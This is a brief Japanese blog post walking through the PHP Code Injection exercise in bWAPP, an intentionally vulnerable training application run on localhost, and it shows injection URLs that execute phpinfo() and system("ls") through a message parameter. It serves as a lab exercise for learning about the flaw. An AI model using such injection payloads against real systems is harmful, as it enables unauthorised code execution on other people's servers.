shikata ga nai

Private? There is no such things.

bWAPPでA1-PHP Code Injection

Hello there,

 

 

A1 ⇨ PHP Code Injectionを選択して。

『message』をして動作を確認して。

 

f:id:ThisIsOne:20191230182106p:plain

 

URLを以下のように変更してみると。

PHPのコマンドが実行されて。

 http://localhost/phpi.php?message=phpinfo()

 

f:id:ThisIsOne:20191230181133p:plain

 

たとえば、動作確認したURLの後に『;』を追加して。

下記のようなコマンドを追記しても。

 http://localhost/phpi.php?message=system("ls");

 

f:id:ThisIsOne:20191231074008p:plain

 

Best regards,

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain